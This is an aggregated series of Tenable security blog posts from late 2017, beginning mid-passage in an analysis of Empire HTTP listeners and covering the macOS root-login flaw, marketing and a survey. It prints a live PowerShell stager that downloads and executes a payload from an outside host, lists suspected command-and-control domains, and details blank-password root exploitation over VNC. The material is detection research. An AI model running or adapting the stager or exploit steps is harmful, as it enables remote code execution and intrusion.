$wc.Proxy;$K=[SystEm.TeXT.EncOdING]::ASCII.GEtByteS('9bd4b7087332164f0bd38400f1485f6f');$R={$D,$K=$ARgs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ser='xxxx://read32.ddns.net:8080';$t='/admin/get.php';$wC.HEAderS.ADd("Cookie","session=P9ax+ES/3uPoTFnzu45H+xlR9ms=");$data=$WC.DOWnLOAdData($sEr+$t);$Iv=$DaTa[0..3];$dAta=$data[4..$DaTa.LEnGTH];-jOIn[ChAr[]](&
$R $DaTa ($IV+$K))|IEX
I also found it interesting that few listeners changed the default Server field
from Microsoft-IIS/7.5. The following table lists the non-default Server values
that I observed.
Server Value
Count
Microsoft-IIS/8.5
7
Microsoft-IIS/9.0
1
Microsoft-IIS/10.0
1
BigIP
1
Apache
1
Apache/2.4.6
1
web012
1
nginx/1.8.0
1
To my knowledge, there is no such thing as IIS 9.0. I’m pretty sure the
versioning jumped from 8.5 to 10.0.
Finally, I found SSL usage in conjunction with Empire to be fairly interesting.
I counted 47 self-signed certificates among the discovered servers. More
intriguing to me is the amount of certificates issued by Let’s Encrypt. It’s
been Let’s Encrypt’s long-standing policy to not police content and I’m
certainly not going to argue against them. Especially since I don’t have
sufficient information to determine if any of the servers are actually
malicious. As such, I’m just going to present the data without further comment.
I’ve broken the domains up into two groups: domains verified to have Empire HTTP
listeners and unreachable servers.
Verified Empire HTTP Listeners
power-shell.net
companysurveys.com
prohockeynews.org
changeme.mefound.com
web02.allcleardata.com
nvwmi64.nt
Unreachable
driverupdatesystem.com
mswordupdates.com
windowstechinfo.co.uk
40xpr0.cdn-microsoft.com
cdn.cloudfiare.ch
creditscore.crownfinancialconcepts.org
www3.akuncapital.com
firstbankcardservices.com
www1.hudsontalentagency.com
c2.ippsaonline.com
www.sharedmz.com
sogood.24hr.com
aldreboende.net
sso.dhow.xyz
streaming.threenow.online
catalog.precisionpartiesebook.com
CONCLUSION
Little mistakes add up. Not just for the blue team but for the red team, too.
Take advantage of your adversaries’ mistakes when you can. In this case, you can
use plugin 99592 to help find any Empire HTTP listeners in your environment.
Image may be NSFW.
Clik here to view.
THE BAD, THE UGLY AND THE CYBER IMMORAL - THANK YOU, UBER
November 28, 2017, 9:43 am
Next Tenable Delivers Industrial Security
Previous Identifying Empire HTTP Listeners
0
0
Image may be NSFW.
Clik here to view.
Technology, business and morality are not mutually exclusive, but rather
fundamentally intertwined into the fabric of how our society operates and will
have to increasingly operate in the future. As information about us is leveraged
at the very core of modern economies, users have every right to expect a
reasonable standard of care when it comes to keeping their personal information
secure. And companies have a legal requirement to do just that. Security is far
from perfect and we all acknowledge that breaches may still occur.
The Uber breach and subsequent coverup displayed not only a disregard for the
law, but more fundamentally a disdain for their customers and basic morality
responsibility. Uber not only failed to protect the information they were
collecting about their customers -- thus causing them potential harm -- they
chose to cover up the breach and subject those individuals to further risk by
not meeting their notification responsibilities.
There are already a number of class action lawsuits against Uber, alleging the
company was negligent in protecting consumer data. That sounds about right.
A digital society and economy require the establishment of a reasonable standard
of care that ensures basic cyber hygiene practices are maintained by all
organizations. While corporations may have resisted such a concept in the past,
the inevitability of cyber attack and the possibility of breaches now has
responsible boards of directors and corporate leaders looking for such clarity
and guidance. All parties are finally saying “enough is enough.” Maybe that
means some good change is around the corner.
Image may be NSFW.
Clik here to view.
TENABLE DELIVERS INDUSTRIAL SECURITY
November 29, 2017, 6:39 am
Next Detecting macOS High Sierra root account vulnerability (CVE-2017-13872)
Previous The Bad, the Ugly and the Cyber Immoral - Thank you, Uber
0
0
Cyber-Physical Security is a Growing Problem
Image may be NSFW.
Clik here to view.
Organizations are continuously leveraging new data and information capabilities
to accelerate their business processes and deliver greater value to customers.
As a result, industries such as energy, utilities, and manufacturing are
becoming increasingly digital and connected. But with new technology come new
challenges.
As physical operations systems, such as industrial control systems (ICS) and
supervisory control and data acquisition (SCADA) devices connect to information
networks – often labeled as the IT/OT convergence – business leaders must
consider the added risk to their production environments.
These systems play a pivotal role in our national, economic and public safety.
Unfortunately, ICS/SCADA systems were not designed with security in mind.
Recently, threats targeting these critical environments have gained increased
recognition with headline-grabbing news such as Stuxnet and Industroyer/Crash
Override. US-CERT released an advisory citing analysis by the Department of
Homeland Security (DHS) and the FBI detecting ongoing efforts by malicious
actors targeting U.S. critical infrastructure.
With increased connectivity, organizations can no longer rely on air-gaps.
Furthermore, security by obscurity is not justified. Recently, critical
infrastructure has become collateral damage in widespread incidents, such as
WannaCry and Petya/Not Petya. While these attacks did not specifically target
ICS/SCADA systems, they caused significant downtime and revenue loss for a
number of organizations.
INDUSTRIAL SECURITY FROM TENABLE
The growing threats targeting critical infrastructure and the rapid convergence
of IT with OT are what led Tenable to research and develop our latest product,
Industrial Security. With this launch, we’re doubling down on our commitment to
empower organizations to understand and reduce cyber risk across the modern
attack surface, including ICS/SCADA.
Industrial Security is designed to help cross-functional teams of information
security and operations engineers understand their cyber risk and protect
operational performance.
By leveraging the non-intrusive, passive capabilities of Nessus Network Monitor,
Industrial Security includes new ICS/SCADA capabilities for asset discovery and
vulnerability detection on critical infrastructure, which require a
non-intrusive approach to vulnerability management. Nessus Network Monitor
provides continuous asset discovery, passive vulnerability detection, and
multi-segment management.
IT’S BETTER TOGETHER - TENABLE AND SIEMENS
Recognizing that OT security is a complex issue that is impossible to solve by a
single vendor, Industrial Security is backed by a strategic partnership with
Siemens. Together, we have combined proven vulnerability management from Tenable
with Siemens’ domain expertise.
Historically, IT solutions have not been able to solve OT problems because IT
vendors did not understand the core goals and priorities of operational
engineers. Leveraging the successful history and deep knowledge of Siemens,
Industrial Security was purpose-built for OT environments.
Siemens brings decades of industrial expertise. Through its dedicated
cybersecurity service, Siemens serves as an integrator helping customers secure
their OT environments. This groundbreaking partnership gives energy and utility
companies safe and continuous visibility into their production networks. Powered
by Siemens, Industrial Security helps companies clearly visualize their OT
attack surface and manage it more confidently by drawing on Siemens’ domain
expertise. Siemens helps customers translate insights into action by
understanding the operational implications of security information, while
prioritizing critical risks to better protect assets.
Image may be NSFW.
Clik here to view.
Search
RSSing.com
--------------------------------------------------------------------------------
DETECTING MACOS HIGH SIERRA ROOT ACCOUNT VULNERABILITY (CVE-2017-13872)
November 29, 2017, 1:14 pm
Next Detecting macOS High Sierra root account without authentication
Previous Tenable Delivers Industrial Security
0
0
Image may be NSFW.
Clik here to view.
On November 28, 2017 a software developer (Lemi Orhan Ergin) reported a critical
flaw in macOS High Sierra which allows any local user to log in as root without
a password after multiple attempts. The vulnerability was originally thought to
only be exploitable if you had physical access to the computer, but our
researchers have been able to exploit this vulnerability to elevate privileges
over an authenticated Secure Shell (SSH) session using a lower privileged
account and remotely using Virtual Network Computing (VNC) if screen sharing is
enabled.
UNDERSTANDING THE ROOT CAUSE
Patrick Wardle provides a very in-depth discussion on the root cause (no pun
intended) of the issue. When a person (authorized or unauthorized) tries to
login to a macOS High Sierra system and the account is not enabled (i.e. root),
a new account is created with the password supplied to the GUI. Even if the
password is empty, a new account will be created with a blank password.
Regardless of attempting to log in over the keyboard, VNC, or over an
authenticated SSH session, the new account is created on the first attempt, and
then you are able to login the second attempt.
If you are a home user and have not enabled SSH or VNC, then you are not at risk
to remote attacks. For corporate environments, this vulnerability is very real
problem, as most of the management tools use remote access like SSH and VNC.
Many management systems, like Nessus® and Tenable.io™, use SSH to perform
management operations. Therefore, organizations that have users with macOS High
Sierra computers are at extreme risk to this vulnerability.
DETECTING VULNERABLE HOSTS
We are releasing several plugins to detect vulnerable hosts. Plugin #104814
detects whether patch (Security Update 2017-001) has been applied on the target
host. Plugin #104848 tries to confirm the existence of a vulnerability by
escalating privileges from a non-admin/non-root user to a root user. The plugin
is only enabled when ‘safe checks’ are disabled since it changes the system
state by disabling the root account if the host is vulnerable and has a blank
root password set. Please review ‘Advanced Scan Policy Steps’ for instructions
to enable this plugin.
* macOS 10.13 root Authentication Bypass (Security Update 2017-001) (104814)
* macOS 10.13 root Authentication Bypass Direct Check (104848)
Image may be NSFW.
Clik here to view.
ADVANCED SCAN POLICY STEPS
When executing the macOS 10.13 root Authentication Bypass Direct Check (104848)
plugin, we recommend scanning systems with a non-root account. To set-up a scan
for this vulnerability, you will need to follow these steps:
1. Add a new scan and choose advanced scan.
Image may be NSFW.
Clik here to view.
2. Next, add the credentials. Remember to use an account but set the “Elevate
privileges with” to “Nothing.” The key to using this plugin is to use the same
account that scan with, but no escalation is authorized. All the systems you are
scanning need to have the same account, which is common for scanning.
Image may be NSFW.
Clik here to view.
3. Next, disable all other plugins, and then enable only the plugin 104848.
Image may be NSFW.
Clik here to view.
(Disable all other plugins)
Image may be NSFW.
Clik here to view.
(Search for the plugin)
Image may be NSFW.
Clik here to view.
(Enable the single plugin)
4. Disable Safe Checks. This setting can be found under ‘Advanced’ in the
setting menu.
Image may be NSFW.
Clik here to view.
5. After selecting the plugins, add in the target range and scan your targets.
Image may be NSFW.
Clik here to view.
HOW DOES THE PLUGIN WORK?
Plugin #104848 exploits the privilege escalation vulnerability to verify the
system is vulnerable. The plugin works as follows:
1. Nessus or Tenable.io will scan the system with the account you supplied in
the advanced policy. Note that this must be a non-root account. After
logging in, the scanner will attempt to run a command as the root user,
authenticating with a blank password. If the host has the root account
disabled and is vulnerable, this will cause the host to enable the root
account and set a blank password, even though the attempted command will
fail.
2. The scanner attempts to run this command again, and if the host is
vulnerable it will now succeed.
3. If root access is granted, then the plugin runs a clean-up process that does
the following:
1. Disables the root account
2. Removes the blank password hash for the root account
Image may be NSFW.
Clik here to view.
WRAPPING UP
We continue to research this vulnerability, and investigate different ways to
detect the vulnerability. When we have new information, we will release
additional plugins.
This vulnerability is a real and present danger to all organizations and should
be patched immediately. Apple recently released a patch to resolve this
vulnerability. Customers with a tightly controlled patch cycle or change control
process should consider asking for an exception for the patch, as allowing
systems vulnerable to this privilege escalation to go un-patched for any period
of time could be devastating to your network. Should a malicious user gain
access to one of these systems, the attacker could begin causing all sorts of
havoc on the network for some time.
Image may be NSFW.
Clik here to view.
DETECTING MACOS HIGH SIERRA ROOT ACCOUNT WITHOUT AUTHENTICATION
November 30, 2017, 11:40 am
Next From Off-the-Rack to Custom Tailored?
Previous Detecting macOS High Sierra root account vulnerability (CVE-2017-13872)
0
0
Image may be NSFW.
Clik here to view.
Yesterday, Tenable™ released two plugins to detect macOS High Sierra installs
which allow a local user to login as root without a password after several login
attempts. Both plugins require authentication, however, there was one scenario
where a user could log in over VNC protocol with the root account and no
password if screen sharing was enabled. Today, we are releasing a plugin to
remotely detect the vulnerability without authentication.
CONFIRMING THE VULNERABILITY
One of my colleagues initially reported that exploitation was possible remotely
over VNC after trying against his personal laptop. To confirm the report, I
fired up tightVNC (an open source VPN server/client) and tried to exploit the
issue on an lab box with “Screen Sharing” enabled (see screenshot below). I ran
into a problem were tightVNC couldn't connect to OSX (more on this later). I
then tried another VNC client, realVNC, and was able to successfully exploit the
issue. After two attempted logins with root and a blank password, the VNC client
drops you to a desktop on the remote host, as root. Now it’s time to look into
the VNC protocol, and figure out how we can write a remote check for this!
Image may be NSFW.
Clik here to view.
DELVING INTO THE VNC PROTOCOL
Anytime you want to learn a new protocol, a good place to start is the RFC. The
RFC for VNC can be found here: https://tools.ietf.org/html/rfc6143
The RFC refers to the protocol as RFB (remote frame buffer). In order to exploit
the vulnerability, we need to figure out how to perform authentication over the
VNC protocol. The first step is to connect to the host and receive a banner,
which looks something like this:
RFB protocol version = 3.889
Next, we send a similar banner string to the server (ending in a new line), and
receive a response for the server that contains the supported authentication
types (response decoded below):
Server Auth Types:
30,33,36,35
The RFC doesn’t mention anything about these authentication types. I needed to
figure out what these were, so I loaded up the debug log for realVNC and saw the
following:
2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: processing security types message
2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type Ard(30)
2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 33](33)
2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 36](36)
2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 35](35)
So realVNC didn’t know what any of these types were, other than type 30, which
they have labeled as Ard. A few Google searches later and we found that Ard
stands for “Apple Remote Desktop”. No wonder tightVNC didn’t work, as the
application only supports the RFC standard authentication types.
To use that type, we send security type 30 (0x1E) to the server, and extract the
response which contains parameters for the authentication. Here is this response
in wireshark:
Image may be NSFW.
Clik here to view.
Looks like Diffie Hellman! The generator value is always two bytes and is first
in the packet. The key length is next and is a two byte integer. The prime
modulus and public key follow and are the same size as the key length. So far,
the debugging output of the plugin outputs this:
RFB protocol version = 3.889
Server Auth Types:
30,33,36,35
Doing apple auth!
ARD Material:
Generator : 0002
Key Length : 128
Prime Modulus : ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece65381ffffffffffffffff
Public Key : a1ef2769ecfa51e2913751a3c51e3fabde0732466915fe0f65cf0aa61f468a929850717f4258a9449da3ba92e3a7ab07d12bb503ea34f079c98837c40dce8cfd123c3bf6ffbef49c6ea42abda1a80d317bd001dc6545da46d4697b5b90a26ef5f859983c2c0b4f09d29883344b05da3222ee268460687c2d8544df62cb2f49b5
So, the obvious thing we need to do is generate our own DH key-pair and
calculate the shared secret. What’s next?
After a bit more Googling and wireshark analysis, we learn that the username and
password are sent using AES encryption (using ECB mode), with the key being the
MD5 value of the shared secret. The username/password are sent in a 128 byte
blob. The first 64 bytes is for the username, the last 64 is for the password.
The username and password are null terminated and the remaining space is padded
with random bytes. Here is an example of the blob with username admin, password
FooBar12 (before we encrypt the data):
Image may be NSFW.
Clik here to view.
To complete the authentication, we need to send the AES encrypted password blob,
plus our public DH key and the server will send a four byte integer to indicate
success/failure. 0 is success, 1 is failure. Now we can write our remote check!
EXPLOITING THE VULNERABILITY
Exploiting the vulnerability is easy. We try to log in using root and a blank
password multiple times (four times max) using the process described above. If
we are successful logging in, then the remote host is vulnerable.
THE NESSUS® PLUGIN
Plugin 104885 was created to exploit the issue remotely over VNC. You must have
“safe checks” disabled in order for this run to plugin. This is because
successful exploitation will enable the root account, so there is a bit of
cleanup involved afterward if you find any affected boxes with the plugin. You
need to both disable the root account, and patch the underlying vulnerability.
Image may be NSFW.
Clik here to view.
WRAP-UP
Apple has already released a patch for this vulnerability. This is a critical
vulnerability by any standard, so please take all necessary steps to patch your
systems as soon as possible. If the patch can’t be applied for some reason,
please disable screen sharing if it's not needed. If it is needed, then enable
the root account and set a strong password.
Image may be NSFW.
Clik here to view.
FROM OFF-THE-RACK TO CUSTOM TAILORED?
December 4, 2017, 6:42 am
Next Announcing Nessus Professional v7
Previous Detecting macOS High Sierra root account without authentication
0
0
A Government Perspective on the Changing CDM Landscape
Image may be NSFW.
Clik here to view.
As the Continuous Diagnostics & Mitigation Program (CDM) begins its next phase
of task orders, it is useful to look back at the earlier stages of the program
to help us understand the importance of changes now being implemented in the
program’s contractual and programmatic structures.
CDM began as a group of GSA Schedule 70 Blanket Purchase Agreements (BPAs),
awarded in August 2013 to 17 companies. The first four task order awards were
for tools, with choice of vendor based on lowest price for each respective tool.
These were followed by Continuous Monitoring as a Service (CMaaS) task order
awards, organized into six different government agency groups.
To compete for CMaaS task orders, contractors architected solutions that
included the tools they selected from the CDM Approved Product List. Upon the
award of each CMaaS task order, the winning contractor set about implementing
their solution for all agencies in the CDM “Group,” regardless of the tools
already in place at a particular agency. For some agencies, this was not a
problem because they already had the same tools, and CDM simply provided them
with additional product and integration funded by DHS. For others, however, this
created a conflict between existing agency IT contracts and architecture and the
new CDM solution. In some cases, this conflict led to a slowdown of CDM
implementation across the agency. With most task orders having only a three-year
period of performance (and some even less), the impact of such slowdowns on
implementation was substantial.
One major challenge to successful CDM rollout has been simply educating the
federal workforce about the value of CDM to their organization. As one
front-line IT manager put it, “If people understand that CDM will ultimately
improve our quality of service, we’ll get that ownership buy-in we need to make
it work.” At Tenable, we have captured these types of insights from CDM CISOs,
PMs and other government and private-sector experts in an ebook, CDM From the
Frontlines. Please visit to read these perspectives on the program, lessons
learned and tips for successful task order performance.
Looking ahead to phase three of the CDM program, the government is shifting its
approach. The next round of CDM task orders, labeled “Dynamic and Evolving
Federal Enterprise Network Defense” (DEFEND), will be structured so as to allow
for more flexibility in individual agency solutions. Recognizing that
establishing a common cybersecurity platform across the federal government is a
basic goal of CDM, the new structure still allows for individual agency-specific
tailoring that should enhance CDM acceptance and speed implementation across
individual agencies.
DEFEND task orders will be awarded under the GSA Alliant contract. Alliant has
57 prime contractors, including 14 of the 17 original CDM BPA holders (and 5 of
the 6 CDM BPA task order awardees). The DEFEND task orders will be awarded, with
all options exercised, for a six-year period of performance – twice that of most
BPA task orders. The task orders will be cost-plus-award fee, providing
substantial incentive for strong technical performance, with the product
purchases being made on a cost-reimbursable basis. Perhaps most importantly, the
DEFEND task order awards will initially be for services only, with a post-award
opportunity for government-contractor collaboration that will enable each agency
to have substantial and meaningful input into their CDM solution architecture,
including product/tool selection.
To enable this post-award collaboration, the government is decoupling the tools
from the task orders. GSA is standing up a new CDM-specific Special Item Number,
or SIN, on GSA Schedule 70, where approved products are available for purchase
after task order award. Those products currently on the CDM Approved Products
List will be grandfathered into the new SIN, and a continuous review process
will be put in place, enabling timely technology refreshment going forward.
Under this decoupled approach, the final decisions as to which to include in a
given agency CDM solution will most likely be made as part of the post-award
Request for Service, or RFS, process that will take place between the agency and
the task order prime contractor. The agency groups will stay the same under
DEFEND as under the BPA – the key difference is the RFS process, which will
enable a more tailored approach for each agency within the group. The task order
awards under DEFEND will be, for practical purposes, single-award IDIQ
contracts, with each agency-specific RFS acting as a task order within the CDM
DEFEND task order. Through the RFS process, an agency will be able to bring its
internal cyber teams to the table with the CDM contractor and work out a
solution that resolves conflicts between the CDM solution and pre-existing
solutions already in place within the agency and its component organizations.
READ "CDM FROM THE FRONTLINES"
Get insights and best practices from industry experts on implemening and
supporting CDM.
Read More
Image may be NSFW.
Clik here to view.
ANNOUNCING NESSUS PROFESSIONAL V7
December 11, 2017, 9:00 pm
Next A Clarification about Nessus Professional
Previous From Off-the-Rack to Custom Tailored?
0
0
New capabilities give security practitioners, consultants and pen-testers
greater flexibility
Image may be NSFW.
Clik here to view.
We’re pleased to announce Nessus Professional v7. More than 20,000 organizations
today use Nessus Professional and there are more than a million and a half
Nessus users worldwide. You, the Nessus community, have made Nessus one of the
most important and trusted solutions in the industry.
Over nearly 20 years, Nessus has become the gold standard for security
practitioners and consultants who want fast and accurate point-in-time scans.
Starting with version 7, we are intensifying our focus on performance and
accuracy, so you can get the job done even faster and more confidently.
NESSUS V7 – A JOURNEY TO GREATER FLEXIBILITY AND PERFORMANCE
We’ve decided to focus the development of Nessus to make it the most efficient
solution for security practitioners, consultants and pen-testers. As such,
during the lifetime of the 7.x release, you’ll experience several enhancements
to achieve that goal.
In the first half of 2018, we’re planning to release our new high-performance
engine, and we’re going to dramatically speed up the installation time. In
addition, it will lower the load on the system during scans, enabling you to
scan faster and scan more hosts at the same time.
EASILY TRANSFERABLE LICENSE
Starting with 7.0, we’re relaxing the licensing check that previously prevented
you from using Nessus in certain cloud environments or on a live distribution
like Kali Linux. Also, with v7, the 10-day wait period to transfer your license
has been completely removed, making it quicker to transfer your license between
computers. With v7, you can install and reinstall Nessus without any waiting
period. Install it on a USB stick and work from there. Install it in your cloud
and stop worrying about being “locked out” because the MAC address of the system
changed after a reboot. We’re thrilled to make this change because it will
enable you to use Nessus in a more flexible and creative way.
REPORTING ENHANCEMENTS
There are also some great enhancements to Nessus Professional reports. With v7,
you can add a custom name and/or logo to reports, as well as auto-email reports
upon scan completion. The name/logo customization is particularly valuable for
consultants and others who want to personalize Nessus reports. And automated
emailing saves time and makes it easier to share results with those who need to
get the information quickly.
NESSUS REIGNS SUPREME
The foundation is as powerful as ever. Nessus – which also powers Tenable.io and
SecurityCenter – is the world’s most trusted vulnerability assessment technology
for security practitioners and consultants because of its:
* High-speed accurate scanning and low false positives
* Complete vulnerability scanning for one low cost
* Support for more technologies and coverage of more vulnerabilities than
competitive solutions
* Unlimited entitlement for IP addresses and scans – scan as many IPs and run
as many assessments as you want
* Ability to correlate scan data with popular pen-testing tools such as
Metasploit, Core Impact, Canvas and ExploitHub
GET MORE INFORMATION
* If you’re a current user and want to learn more about Nessus Professional v7,
including a message from Nessus creator Renaud Deraison, visit "What’s New In
Nessus Professional v7"
* Learn more about Nessus features, benefits and resources, including the
latest plugins
* Start a free 7-day trial of Nessus Professional
JOIN THE CONVERSATION – ONLINE OR IN PERSON
We’ve launched a new Tenable Community. Join the Nessus Professional group for
Nessus Professional v7 announcements and conversation! There’s much more in
store for Nessus in 2018 – join the community to stay in the loop!
Have a happy holiday period and we hope to see you in the new year at our
inaugural user conference, Edge, March 6-9, 2018 in Los Angeles!
Image may be NSFW.
Clik here to view.
A CLARIFICATION ABOUT NESSUS PROFESSIONAL
December 13, 2017, 8:08 am
Next New Study: Many Consumers Lack Understanding of Basic Cyber Hygiene
Previous Announcing Nessus Professional v7
0
0
Image may be NSFW.
Clik here to view.
To our valued Nessus community,
We recently launched a new Tenable Community platform to provide better customer
interaction, between customers and with us at Tenable. The new platform combines
both the Community and Support in a single location to provide you with a more
seamless experience. We migrated all Tenable support customers and existing
community members to the new platform on Monday, December 4th. As part of the
rollout we created a new Nessus Professional group in the community yesterday,
and inadvertently turned on notifications for every post. This triggered a
cascade of emails for a subset of Nessus Professional customers for
approximately two hours yesterday. We apologize to all customers who were
affected by this error.
Upon learning of this issue yesterday, our team immediately identified and
quickly resolved it. We are currently implementing system changes to ensure no
new notifications will be sent to group members unless you update your own
notification preferences. Also, customers will only be added to Collaboration
Groups upon their consent. As an extra precaution, we have temporarily disabled
the community site as we update the settings. Once the community site is back
online we’ll provide instructions on how to update your preferences. In the
meantime, if you are in a group and would like to be removed, please email
community@tenable.com directly and we will remove you.
We understand this was annoying and we apologize. This mistake is below the
standard we set for ourselves to provide you, our valued customers, with a great
experience. We understand the trust that you place in Tenable and we take that
responsibility extremely seriously. You have our commitment that nothing like
this will happen again.
In spite of this unfortunate error, I’m very excited by the new community site
-- I look back in time to our original support “channel” for Nessus (venerable
mailing lists) and see the contrast and potential to enable each one of you to
better share your feedback, knowledge and tips regarding our products, and I
simply can’t wait for our team and myself to interact with you this way.
Separately, I also wanted to clarify some of the recent updates to Nessus
Professional v7 specific to the API functionality. Nessus has become the gold
standard for security practitioners who want fast, comprehensive and accurate
point-in-time scans. Starting with version 7, we’ve decided to focus exclusively
on this use case and dedicate our development to it. I originally designed
Nessus to be used by an individual practitioner or consultant from within the
interface. It was never intended for use in a purely automated fashion, using
the API to run scans remotely and extract the data into another system. In fact,
the first version of Nessus didn’t even have any form of command line support.
As a result, we never built any safeguards in the API preventing a script from
misusing it and overloading the scanner. Ultimately we decided to let go of this
API after having seen some misuse of this functionality which stretched the
capabilities of the scanner.
For users who need to initiate and manage scans remotely, we have built a much
better user experience in Tenable.io, which offers a robust, supported and
better documented API, along with richer reporting options and the ability to
manage and federate multiple scanners.
Another point I’d like to cover is the removal of multi-user support in Nessus
Professional v7. In the past, you could create multiple, independent users in
Nessus Professional v6 and prior versions. We evaluated this feature and
realized it adds confusion and falls short of expectations since users can’t
share results, so we decided to remove it as well.
These changes were done in the spirit of clarifying our product portfolio so we
can focus our development efforts on the features that matter – and what
practitioners actually use. Less than 2% of users use the remote scan API, and
there are only a handful of scanners out there with multiple users. We believe
using our engineering resources to make the scanner more efficient, flexible and
scalable rather than focus on corner use cases is the right strategy to
providing you with the best experience.
For users who need fast, accurate, point-in-time vulnerability assessment, we
want to empower you to get your job done and give you the power and flexibility
you need. I’m excited to say that that’s precisely what we’re delivering with
Nessus Professional v7. In addition to ongoing improvements in performance and
vulnerability coverage, we also made the Nessus Professional license easily
transferable (eliminating the 10-day waiting period), removed the “computer
tie-in” so you can now install Nessus on a bootable USB stick or cloud instance,
enabled you to include your own tailored branding in reports and added automated
report delivery upon scan completion.
You can find more information about Nessus Professional v7 here. If you have any
questions or concerns, do not hesitate to contact us at support@tenable.com.
I’d like to thank each of you for being loyal Nessus users. We are committed to
continuing on our heritage of innovation with continual development and
improvements to our entire product portfolio. We look forward to delivering
advancements that make you more successful, efficient and secure.
Thank You,
Renaud Deraison
Co-founder and CTO
Image may be NSFW.
Clik here to view.
NEW STUDY: MANY CONSUMERS LACK UNDERSTANDING OF BASIC CYBER HYGIENE
December 18, 2017, 5:00 am
Next Congress Achieves Real IT Modernization Progress
Previous A Clarification about Nessus Professional
0
0
Image may be NSFW.
Clik here to view.
Data breaches have been a headache for many years and for a long time there
seemed to be a general apathy about them. Our sense was that things may have
changed in the wake of the most severe breach ever – the theft of 145 million
social security numbers and other sensitive data from Equifax – which leaves
most Americans with the burden of having to monitor for identity theft for the
rest of their lives.
Against this backdrop, we decided to find out how aware Americans are of
cybersecurity threats and risks, how concerned they are about getting their
information stolen, and what they might be doing, or more importantly, not doing
about it. We also wanted to learn if recent breaches have caused Americans to
change their behavior at all. Tenable recently commissioned a survey, conducted
online by Harris Poll of more than 2,000 U.S. adults, to determine how data
breaches – and media attention around them – are impacting consumers’
perceptions about their online security and their behavior.
Going into this project, our hypothesis was that because of all the recent
breaches, Americans are more aware of security breaches than they were in the
past, but that they likely continue to use poor security practices. The results
are worse than we anticipated. According to the survey, more than 9 in 10
Americans (94%) have heard news stories about security breaches in the past 12
months, but among them, more than 2 in 5 (43%) have not changed their online
habits as a result of these stories. This suggests many Americans may not
understand that they have a role in accountability when it comes to taking
specific actions to safeguard their personal data.
CYBER ILLITERACY IS RAMPANT
While many Americans are aware of breaches in the news, it appears that about 1
in 5 (21%) aren’t sure if they have been impacted by security breaches in the
past 12 months. Only 12 percent of Americans say their personal information has
been stolen by hackers due to a security breach in the past 12 months. But given
that the Equifax breach exposed sensitive data of as many as 143 million
Americans, that number is statistically impossible. Given the Yahoo! breach and
countless others, this data suggests an alarming lack of understanding about the
pervasiveness of recent breaches and the risks they pose to average Americans.
It’s cyber illiteracy.
While most Americans (94%) have heard of news stories about security breaches in
the last year and a majority say they are worried about risks associated with
activities as basic as use of public Wi-Fi hotspots and online shopping, many
still have not taken some critical steps to protect their data. For example,
only 25 percent of Americans have implemented two-factor authentication on their
devices to protect their personal information in the past 12 months, even though
security experts and major online services and technology companies like
Facebook and Google strongly encourage it. Although more than 2 in 3 Americans
(68%) say they have avoided opening links/attachments from unsolicited emails or
texts in the past 12 months, we suggest more Americans do this as this has been
an industry best practice for security since the early 2000s. In addition, only
about 3 in 10 Americans who have heard of any news stories on security breaches
in the past 12 months (32%) have reduced their use of public Wi-Fi or unknown
hotspots as a result, which could mean many still frequently do this – a major
no-no.
Many Americans do not seem very confident about the security of their data, as
nearly 2 in 5 (37%) said they think it’s likely their personal information will
be stolen as a result of a security breach in the next six months. Additionally,
it appears many Americans are worried about their personal information getting
stolen as a result of some of the most common online activities. While 63
percent are worried about their data getting stolen when connecting to public or
unknown Wi-Fi hotspots, nearly 3 in 5 (58%) are worried about their personal
information being stolen when online shopping, half (50%) are worried when
banking online, and 35 percent are concerned when connecting with their
friends/family through social media.
ROUGHLY ONE IN TWO AMERICANS LACKS BASIC CYBER HYGIENE
The survey demonstrates that nearly all consumers are aware of security
breaches, but many do not take some basic precautions to protect their data. In
the past 12 months, only 56 percent of Americans have used a password to lock
their computer and only 45 percent use a PIN to lock their mobile devices.
Roughly half of Americans (53%) say they have made their account passwords more
complicated in the past 12 months, and 15 percent have used a password
management tool. Another emerging authentication technology – biometrics – is
still not widespread, with only 19 percent of Americans reporting that they have
implemented it on their devices in the past 12 months. This is a surprising
result given the fact that Apple has offered the user’s thumbprint as a security
measure since 2013.
Even when the minimal is offered, Americans may not be capitalizing on some of
the easiest ways to stay on top of their personal cybersecurity. Using credit
monitoring services, which Equifax and other breach victims offer for free for a
year, is one of the many ways to monitor for identity fraud. So we were
surprised to find that so few Americans have signed up for such a service. Only
roughly one-quarter of Americans (26%) have used a credit monitoring service to
protect their personal information in the past 12 months, and only 12 percent
have used an identity monitoring service.
Another basic tactic is to update, update, update and FAST! Apps that are
downloaded onto devices can offer a popular inroad for hackers to compromise
devices and steal data if the apps have security vulnerabilities, which is
fairly common. Hackers who uncover the security weaknesses can exploit them only
as long as they haven’t been patched. So, minimizing that window of opportunity
is key to staying safe. While some Americans seem to be trying to stay on top of
their software updates, many still aren’t updating their apps in a timely manner
when the updates are available. Fourteen percent of smartphone users wait more
than a week to update apps on their smartphone (or never do it) after receiving
a prompt. Meanwhile, 13 percent of computer users wait more than a week to
update the apps on their computer – including 3 percent who wait longer than a
month after receiving a prompt to do so and 5 percent who don’t update apps on
their computer at all.
CONSUMER SECURITY CHECKLIST
1. Where applicable, enable two-factor authentication for all online services.
2. Update your apps and computers within 24 hours of receiving a notification.
3. Assign strong passwords to your computer, mobile phone and tablet – and
don’t share them with others.
WHAT DOES THIS MEAN FOR ENTERPRISES?
Organizations are scrambling to shore up their defenses in light of all the
breaches, as they should be. But they also need to lead the way in basic
security practices that keep their customer and critical business data safe. It
